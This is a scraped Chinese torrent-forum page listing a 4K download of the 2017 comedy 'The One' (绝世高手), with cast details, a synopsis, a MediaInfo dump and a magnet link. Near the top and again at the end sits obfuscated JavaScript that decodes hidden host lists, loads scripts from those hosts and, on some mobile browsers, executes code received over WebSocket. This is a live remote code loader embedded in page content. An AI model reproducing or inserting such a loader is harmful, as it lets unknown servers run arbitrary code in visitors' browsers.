绝世高手[国语配音/中文字幕].The.One.2017.2160p.WEB-DL.H265.DD2.0 23.89GB

版主小s 1月前 299

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 绝世高手 / 绝世高手之料理铁人 / The One

◎年 代 2017

◎产 地 中国大陆

◎类 别 喜剧

◎语 言 汉语普通话

◎上映日期 2017-07-07(中国大陆) / 2017-06-22(上海电影节)

◎IMDb链接 https://www.imdb.com/title/tt7121588/

◎豆瓣评分 5.9/10 (79244人评价)

◎豆瓣链接 https://movie.douban.com/subject/26754831/

◎片 长 116分钟

◎导 演 卢正雨 Zhengyu Lu (id:1320676)

◎编 剧 卢正雨 Zhengyu Lu (id:1320676)

赵英俊 Yingjun Zhao (id:1315474)

冷旭阳 Xuyang Leng (id:1375674)

果晓丹 Xiaodan Guo (id:1327971)

◎演 员 卢正雨 Zhengyu Lu (id:1320676)

郭采洁 Amber Kuo (id:1274814)

范伟 Wei Fan (id:1051526)

蔡国庆 Guoqing Cai (id:1314747)

陈冲 Joan Chen (id:1044964)

仓田保昭 Yasuaki Kurata (id:1032379)

孔连顺 Lianshun Kong (id:1339768)

黄龄 Ling Huang (id:1316706)

杨迪 Di Yang (id:1317329)

柯达 Da Ke (id:1340746)

艾伦 Allen (id:1350408)

赵英俊 Yingjun Zhao (id:1315474)

魏翔 Xiang Wei (id:1355058)

汪聪 Cong Wang (id:1354045)

何蓝逗 Lan He (id:1376538)

魏金栋 Jindong Wei (id:1379529)

李勤勤 Qinqin Li (id:1274639)

刘伟政 Wei Zheng Liu (id:1379717)

许文姗 Audrey Hui (id:1408521)

卢卓 Zhuo Lu (id:1362362)

孙丽丽 Lili Sun (id:1415740)

张力川 Lichuan Zhang (id:1405451)

范霞 Xia Fan (id:1322310)

郑志昊 Zhihao Zheng (id:1397531)

程武 Wu Cheng (id:1406349)

邹沙沙 Aiken Zou Shasha (id:1392574)

董宸辰 Chenchen Dong (id:1419013)

赵英俊 Yingjun Zhao (id:1315474)

任雅静 Léa Ren (id:1383828)

胡伟立 Wai Lap Wu (id:1275249)

程马志远 Zhiyuan Chengma (id:1332057)

王春枝 Chunzhi Wang (id:1416291)

郜子瑜 Ziyu Gao (id:1401860)

王改改 (id:1429473)

周肖林 Xiaolin Zhou (id:1365738)

麦子善 Marco Mak (id:1280638)

许宏宇 Derek Hui (id:1275501)

赵学昊 Xuehao Zhao (id:1425475)

任可 Ted (id:1428167)

◎标 签 喜剧 / 无厘头 / 搞笑 / 2017 / 中国大陆 / 美食 / 剧情 / 黑色幽默

◎简 介

一个先天没有知觉,挨揍不疼却冒充高手的小混混(卢正雨 饰),一个人称女张飞的暴力少女(郭采洁 饰),一个醉心于织毛衣的过气大师(范伟 饰),一个只会做黑暗料理的美食大亨(蔡国庆 饰),一个可以用汤操纵情绪的当代孟婆(陈冲 饰),一个身患强迫症的日本武士(仓田保昭 饰),为了一本失传的秘笈,引发了一场绝世高手的爆笑对决。

◎获奖情况 (共1项)

第4届豆瓣电影年度榜单 (2017)

7月最受关注电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Complete name : 绝世高手[email protected]

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom/iso2/mp41)

  7. File size : 23.9 GiB

  8. Duration : 1 h 55 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 29.5 Mb/s

  11. Writing application : OurTV Multimedia Platform


  12. Video

  13. ID : 1

  14. Format : HEVC

  15. Format/Info : High Efficiency Video Coding

  16. Format profile : [email protected]@High

  17. Codec ID : hev1

  18. Codec ID/Info : High Efficiency Video Coding

  19. Duration : 1 h 55 min

  20. Bit rate : 29.0 Mb/s

  21. Width : 3 840 pixels

  22. Height : 2 160 pixels

  23. Display aspect ratio : 16:9

  24. Frame rate mode : Constant

  25. Frame rate : 25.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.140

  30. Stream size : 23.5 GiB (98%)

  31. Writing library : PONTUS-series

  32. Color range : Limited

  33. Codec configuration box : hvcC


  34. Audio #1

  35. ID : 2

  36. Format : AC-3

  37. Format/Info : Audio Coding 3

  38. Commercial name : Dolby Digital

  39. Codec ID : ac-3

  40. Duration : 1 h 55 min

  41. Bit rate mode : Constant

  42. Bit rate : 384 kb/s

  43. Channel(s) : 2 channels

  44. Channel layout : L R

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 31.250 FPS (1536 SPF)

  47. Compression mode : Lossy

  48. Stream size : 318 MiB (1%)

  49. Title : 国语DD2.0

  50. Language : Chinese

  51. Service kind : Complete Main

  52. Default : Yes

  53. Alternate group : 1


  54. Audio #2

  55. ID : 3

  56. Format : AAC LC SBR

  57. Format/Info : Advanced Audio Codec Low Complexity with Spectral Band Replication

  58. Commercial name : HE-AAC

  59. Format settings : Implicit

  60. Codec ID : mp4a-40-2

  61. Duration : 1 h 55 min

  62. Bit rate mode : Variable

  63. Bit rate : 128 kb/s / 128 kb/s

  64. Channel(s) : 2 channels

  65. Channel layout : L R

  66. Sampling rate : 44.1 kHz

  67. Frame rate : 21.533 FPS (2048 SPF)

  68. Compression mode : Lossy

  69. Stream size : 105 MiB (0%)

  70. Title : 国语AAC2.0

  71. Language : Chinese

  72. Default : No

  73. Alternate group : 1




复制代码


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:9A834921633178CDE52AB5755AF68726FFE3E4DA

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};